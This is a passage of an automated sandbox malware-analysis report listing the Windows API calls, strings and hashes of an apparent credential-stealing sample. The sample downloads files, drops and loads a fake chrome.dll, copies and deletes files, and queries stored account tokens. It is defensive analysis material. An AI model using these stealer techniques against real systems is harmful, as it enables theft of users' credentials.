                                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004182E8
                                            • __aulldiv.LIBCMT ref: 00418302
                                            • __aulldiv.LIBCMT ref: 00418310
                                            • wsprintfA.USER32 ref: 0041833C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                            • String ID: %d MB$@
                                            • API String ID: 2886426298-3474575989
                                            • Opcode ID: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                            • Instruction ID: 389ef6515a1f2427be64b00d9458de7be2b91b0079cd17c5d853587b1d371e56
                                            • Opcode Fuzzy Hash: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                            • Instruction Fuzzy Hash: 8B214AF1E44218ABDB00DFD5DD49FAEBBB9FB44B04F10450AF615BB280D77969008BA9
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,006D6D60,00000000,?,00420E14,00000000,?,00000000), ref: 02408527
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0240852E
                                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 0240854F
                                            • __aulldiv.LIBCMT ref: 02408569
                                            • __aulldiv.LIBCMT ref: 02408577
                                            • wsprintfA.USER32 ref: 024085A3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                            • String ID: @$pkm
                                            • API String ID: 2774356765-1350193380
                                            • Opcode ID: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                            • Instruction ID: 15f207c08aa016554fbeade6c189d9e6c69bbe88a7d22220d17b99d087a57a68
                                            • Opcode Fuzzy Hash: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                            • Instruction Fuzzy Hash: AD214DB1E44318ABDB00DBD5CD45FAEBBB9FB44B04F10451AF615BB2C0D77859408BA5
                                            APIs
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                              • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                            • InternetOpenA.WININET(00420DFB,00000001,00000000,00000000,00000000), ref: 0040615F
                                            • StrCmpCA.SHLWAPI(?,00A72600), ref: 00406197
                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004061DF
                                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406203
                                            • InternetReadFile.WININET(00412DB1,?,00000400,?), ref: 0040622C
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040625A
                                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00406299
                                            • InternetCloseHandle.WININET(00412DB1), ref: 004062A3
                                            • InternetCloseHandle.WININET(00000000), ref: 004062B0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                            • String ID:
                                            • API String ID: 4287319946-0
                                            • Opcode ID: 1ca4e18fc22758868358a647b535e6204b6b56777c6f5e304cd5102df954997b
                                            • Instruction ID: 62bae03b9e4771e022f65dfe0b744ca25a6527e7e90d195df508867c32b8ef77
                                            • Opcode Fuzzy Hash: 1ca4e18fc22758868358a647b535e6204b6b56777c6f5e304cd5102df954997b
                                            • Instruction Fuzzy Hash: CD5184B1A01218ABDB20EF90DC45FEE7779AB44305F0041AEF605B71C0DB786A95CF59
                                            APIs
                                              • Part of subcall function 0240AD17: lstrcpy.KERNEL32(?,00000000), ref: 0240AD5D
                                              • Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4AA1
                                              • Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4AB8
                                              • Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4ACF
                                              • Part of subcall function 023F4A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 023F4AF0
                                              • Part of subcall function 023F4A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 023F4B00
                                            • InternetOpenA.WININET(00420DFB,00000001,00000000,00000000,00000000), ref: 023F63C6
                                            • StrCmpCA.SHLWAPI(?,006D6E80), ref: 023F63FE
                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 023F6446
                                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 023F646A
                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 023F6493
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 023F64C1
                                            • CloseHandle.KERNEL32(?,?,00000400), ref: 023F6500
                                            • InternetCloseHandle.WININET(?), ref: 023F650A
                                            • InternetCloseHandle.WININET(00000000), ref: 023F6517
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                            • String ID:
                                            • API String ID: 4287319946-0
                                            • Opcode ID: b1da7730cf3e973672ea3d958da0836ae58ce978cfb0a793029a7ab8af6d853d
                                            • Instruction ID: 57188c1ba08a1133307465c779a7df64e078b16fef0ff91aeefebcb9fd95e905
                                            • Opcode Fuzzy Hash: b1da7730cf3e973672ea3d958da0836ae58ce978cfb0a793029a7ab8af6d853d
                                            • Instruction Fuzzy Hash: 325174B1A00218ABDB24EF50DC45FEE777DAF44305F0081AAE715A71C0DB74AA85CF95
                                            APIs
                                            • memset.MSVCRT ref: 0240523E
                                              • Part of subcall function 024091D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02409202
                                            • lstrcat.KERNEL32(?,00000000), ref: 02405267
                                            • lstrcat.KERNEL32(?,00420FE8), ref: 02405284
                                              • Part of subcall function 02404DC7: wsprintfA.USER32 ref: 02404DE3
                                              • Part of subcall function 02404DC7: FindFirstFileA.KERNEL32(?,?), ref: 02404DFA
                                            • memset.MSVCRT ref: 024052CA
                                            • lstrcat.KERNEL32(?,00000000), ref: 024052F3
                                            • lstrcat.KERNEL32(?,00421008), ref: 02405310
                                              • Part of subcall function 02404DC7: StrCmpCA.SHLWAPI(?,00420FC4), ref: 02404E28
                                              • Part of subcall function 02404DC7: StrCmpCA.SHLWAPI(?,00420FC8), ref: 02404E3E
                                              • Part of subcall function 02404DC7: FindNextFileA.KERNEL32(000000FF,?), ref: 02405034
                                              • Part of subcall function 02404DC7: FindClose.KERNEL32(000000FF), ref: 02405049
                                            • memset.MSVCRT ref: 02405356
                                            • lstrcat.KERNEL32(?,00000000), ref: 0240537F
                                            • lstrcat.KERNEL32(?,00421020), ref: 0240539C
                                              • Part of subcall function 02404DC7: wsprintfA.USER32 ref: 02404E67
                                              • Part of subcall function 02404DC7: StrCmpCA.SHLWAPI(?,004208D3), ref: 02404E7C
                                              • Part of subcall function 02404DC7: wsprintfA.USER32 ref: 02404E99
                                              • Part of subcall function 02404DC7: PathMatchSpecA.SHLWAPI(?,?), ref: 02404ED5
                                              • Part of subcall function 02404DC7: lstrcat.KERNEL32(?,006D6F24), ref: 02404F01
                                              • Part of subcall function 02404DC7: lstrcat.KERNEL32(?,00420FE0), ref: 02404F13
                                              • Part of subcall function 02404DC7: lstrcat.KERNEL32(?,?), ref: 02404F27
                                              • Part of subcall function 02404DC7: lstrcat.KERNEL32(?,00420FE4), ref: 02404F39
                                              • Part of subcall function 02404DC7: lstrcat.KERNEL32(?,?), ref: 02404F4D
                                              • Part of subcall function 02404DC7: CopyFileA.KERNEL32(?,?,00000001), ref: 02404F63
                                              • Part of subcall function 02404DC7: DeleteFileA.KERNEL32(?), ref: 02404FE8
                                            • memset.MSVCRT ref: 024053E2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                            • String ID:
                                            • API String ID: 4017274736-0
                                            • Opcode ID: 526dae8c9c0fde88560bc6a89523ce9510f779cd9e33a96f7e7cea5f911dcca2
                                            • Instruction ID: 1e766ff6461439c27cdaea5311aeeceaf6c38e51c950797cf2baaa17efc280eb
                                            • Opcode Fuzzy Hash: 526dae8c9c0fde88560bc6a89523ce9510f779cd9e33a96f7e7cea5f911dcca2
                                            • Instruction Fuzzy Hash: 7241D6B5E4032467DB20E770EC8AFDD3339AF20701F804569B689660D0EEB857C88F91
                                            APIs
                                            • type_info::operator==.LIBVCRUNTIME ref: 0246F6B4
                                            • ___TypeMatch.LIBVCRUNTIME ref: 0246F7C2
                                            • CatchIt.LIBVCRUNTIME ref: 0246F813
                                            • CallUnexpected.LIBVCRUNTIME ref: 0246F92F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                            • String ID: csm$csm$csm
                                            • API String ID: 2356445960-393685449
                                            • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                            • Instruction ID: 2aa8d83de5c2e0ea46d102b8b7b79e8f4126d43e8fcd20067b94a517d77d3f9a
                                            • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                            • Instruction Fuzzy Hash: 44B1AE35800209AFCF14DFA5E848ABFB7B6FF04314B16415BE8966BA11C331D95ACF92
                                            APIs
                                            • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0041735E
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • OpenProcess.KERNEL32(001FFFFF,00000000,0041758D,004205C5), ref: 0041739C
                                            • memset.MSVCRT ref: 004173EA
                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0041753E
                                            Strings
                                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041740C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: OpenProcesslstrcpymemset
                                            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                            • API String ID: 224852652-4138519520
                                            • Opcode ID: d72bd8021f4414250ebe0f422098046d8e2db5ca649e3467c1f3bf7c9bcf0af0
                                            • Instruction ID: 233c3b8a05bec9dd0facad4523d46c30dcb6cb295cabbf2d5ddda9a1061df09f
                                            • Opcode Fuzzy Hash: d72bd8021f4414250ebe0f422098046d8e2db5ca649e3467c1f3bf7c9bcf0af0
                                            • Instruction Fuzzy Hash: 24515FB0D04218ABDB14EF91DC45BEEB7B5AF04305F1041AEE21567281EB786AC8CF59
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                            • lstrlenA.KERNEL32(00000000), ref: 0040BC6F
                                              • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BC9D
                                            • lstrlenA.KERNEL32(00000000), ref: 0040BD75
                                            • lstrlenA.KERNEL32(00000000), ref: 0040BD89
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                            • API String ID: 1440504306-1079375795
                                            • Opcode ID: 47e1307db4a3cf53f5797603b385faac116279239a3b1e4e36c389049f26679a
                                            • Instruction ID: 6476b4a2e47316619015001d7be3bff7ad81932ea7eb7605c7a9cb508b765a87
                                            • Opcode Fuzzy Hash: 47e1307db4a3cf53f5797603b385faac116279239a3b1e4e36c389049f26679a
                                            • Instruction Fuzzy Hash: E9B17371A111089BCB04FBA1DCA6EEE7339AF14314F40456FF50673195EF386A98CB6A
                                            APIs
                                            • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
                                            • GetProcAddress.KERNEL32(00000000,connect_to_websocket), ref: 0040A0BE
                                            • GetProcAddress.KERNEL32(00000000,free_result), ref: 0040A0D5
                                            • FreeLibrary.KERNEL32(00000000,?,004108E4), ref: 0040A0F9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressLibraryProc$FreeLoad
                                            • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                            • API String ID: 2256533930-1545816527
                                            • Opcode ID: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                            • Instruction ID: 41317d004e32df3368e0b40b2df30f060e9b3f1c7a199a11b2b6647de007d5a9
                                            • Opcode Fuzzy Hash: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                            • Instruction Fuzzy Hash: 57F01DB4E0E324EFD7009B60ED48B563BA6E318341F506437F505AB2E0E3B85494CB6B
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess$DefaultLangUser
                                            • String ID: *
                                            • API String ID: 1494266314-163128923
                                            • Opcode ID: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
                                            • Instruction ID: 485b87df60e927c5081145715141aeea1c9fd48c6e3f29f258bd7afdae13bdb0
                                            • Opcode Fuzzy Hash: 8ad7487ebdf551ce844e744865076748c7b192adeb82af89cb9554ed9750e1ed
                                            • Instruction Fuzzy Hash: AFF0E232D8E218EFD3409FE0EC0979CFB31EB05707F064296F60996190E6708A80CB52
                                            APIs
                                              • Part of subcall function 023F7597: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 023F7601
                                              • Part of subcall function 023F7597: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 023F7678
                                              • Part of subcall function 023F7597: StrStrA.SHLWAPI(00000000,0042191C,00000000), ref: 023F76D4
                                              • Part of subcall function 023F7597: GetProcessHeap.KERNEL32(00000000,?), ref: 023F7719
                                              • Part of subcall function 023F7597: HeapFree.KERNEL32(00000000), ref: 023F7720
                                            • lstrcat.KERNEL32(006D7068,0042192C), ref: 023F78CD
                                            • lstrcat.KERNEL32(006D7068,00000000), ref: 023F790F
                                            • lstrcat.KERNEL32(006D7068,00421930), ref: 023F7921
                                            • lstrcat.KERNEL32(006D7068,00000000), ref: 023F7956
                                            • lstrcat.KERNEL32(006D7068,00421934), ref: 023F7967
                                            • lstrcat.KERNEL32(006D7068,00000000), ref: 023F799A
                                            • lstrcat.KERNEL32(006D7068,00421938), ref: 023F79B4
                                            • task.LIBCPMTD ref: 023F79C2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                            • String ID:
                                            • API String ID: 2677904052-0
                                            • Opcode ID: 754e135dd435b5109bd89d6f633deaab1f2fe0ec03a021116c7625d90a29a748
                                            • Instruction ID: 2b6e933f0ac1acacc88adfab3957868e95bd681815e7369bac3d73380b78fdca
                                            • Opcode Fuzzy Hash: 754e135dd435b5109bd89d6f633deaab1f2fe0ec03a021116c7625d90a29a748
                                            • Instruction Fuzzy Hash: DB3145B1E05114DFCB48EBE4EC95DFF777AAB44301F10511AE602672A0EB34AA85CF91
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 023F5281
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 023F5288
                                            • InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 023F52A1
                                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 023F52C8
                                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 023F52F8
                                            • memcpy.MSVCRT(00000000,?,00000001), ref: 023F5341
                                            • InternetCloseHandle.WININET(?), ref: 023F5370
                                            • InternetCloseHandle.WININET(?), ref: 023F537D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                            • String ID:
                                            • API String ID: 1008454911-0
                                            • Opcode ID: 9d9a8564c17c37c6ab9290f4ff10c49815d7cff8932d35ae010a82ac5e0e1cea
                                            • Instruction ID: d26c11ad0ded99f67b88f1afaa0a7ff81391e904853ea4e1ad6d131d7f92bbae
                                            • Opcode Fuzzy Hash: 9d9a8564c17c37c6ab9290f4ff10c49815d7cff8932d35ae010a82ac5e0e1cea
                                            • Instruction Fuzzy Hash: 6331F8B5E44218ABDB20CF54DC85BDCB7B5AB48304F5081EAF709A7281D7706AC5CF59
                                            APIs
                                              • Part of subcall function 0240AD97: lstrlen.KERNEL32(023F51BC,?,?,023F51BC,00420DDF), ref: 0240ADA2
                                              • Part of subcall function 0240AD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 0240ADFC
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                            • StrCmpCA.SHLWAPI(00000000,004210B0,00000000), ref: 02405AFB
                                            • StrCmpCA.SHLWAPI(00000000,004210B8), ref: 02405B58
                                            • StrCmpCA.SHLWAPI(00000000,004210C8), ref: 02405D0E
                                              • Part of subcall function 0240AD17: lstrcpy.KERNEL32(?,00000000), ref: 0240AD5D
                                              • Part of subcall function 024056A7: StrCmpCA.SHLWAPI(00000000,00421074), ref: 024056DF
                                              • Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C
                                              • Part of subcall function 02405777: StrCmpCA.SHLWAPI(00000000,00421084,00000000), ref: 024057CF
                                              • Part of subcall function 02405777: lstrlen.KERNEL32(00000000), ref: 024057E6
                                              • Part of subcall function 02405777: StrStrA.SHLWAPI(00000000,00000000), ref: 0240581B
                                              • Part of subcall function 02405777: lstrlen.KERNEL32(00000000), ref: 0240583A
                                              • Part of subcall function 02405777: strtok.MSVCRT(00000000,?), ref: 02405855
                                              • Part of subcall function 02405777: lstrlen.KERNEL32(00000000), ref: 02405865
                                            • StrCmpCA.SHLWAPI(00000000,004210C0,00000000), ref: 02405C42
                                            • StrCmpCA.SHLWAPI(00000000,004210D0,00000000), ref: 02405DF7
                                            • StrCmpCA.SHLWAPI(00000000,004210D8), ref: 02405EC3
                                            • Sleep.KERNEL32(0000EA60), ref: 02405ED2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpylstrlen$Sleepstrtok
                                            • String ID:
                                            • API String ID: 3630751533-0
                                            • Opcode ID: 0eb3445eed1b3daeda1f2162748cb05894813a744caa4cc26cce728cb2d7be17
                                            • Instruction ID: 73f2372cfa3e30bcb80bfec54f8edc58bc7cf0cb7fa0c6e1458219d32e64d442
                                            • Opcode Fuzzy Hash: 0eb3445eed1b3daeda1f2162748cb05894813a744caa4cc26cce728cb2d7be17
                                            • Instruction Fuzzy Hash: B5E1FA719002149ACB18FBA1ECD5EEE733BAF54300F90857EE656661D0EF356A88CF91
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 00419850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004108DC,C:\ProgramData\chrome.dll), ref: 00419871
                                              • Part of subcall function 0040A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
                                            • StrCmpCA.SHLWAPI(00000000,00A6DE80), ref: 00410922
                                            • StrCmpCA.SHLWAPI(00000000,00A6DDC0), ref: 00410B79
                                            • StrCmpCA.SHLWAPI(00000000,00A6DDD0), ref: 00410A0C
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                            • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00410C35
                                            Strings
                                            • C:\ProgramData\chrome.dll, xrefs: 00410C30
                                            • C:\ProgramData\chrome.dll, xrefs: 004108CD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                            • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                            • API String ID: 585553867-663540502
                                            • Opcode ID: 6fa52e141afa07bae2f7f81fa1d001bb92de8cedc841732e46451214a9d8632a
                                            • Instruction ID: 798b8003b846a09b6b7b20e33334a9dbf0f3b1503011c00658a7b4d9c0c3a9bc
                                            • Opcode Fuzzy Hash: 6fa52e141afa07bae2f7f81fa1d001bb92de8cedc841732e46451214a9d8632a
                                            • Instruction Fuzzy Hash: DCA176717001089FCB18EF65D996FED7776AF94304F10812EE40A5F391EB349A49CB9A
                                            APIs
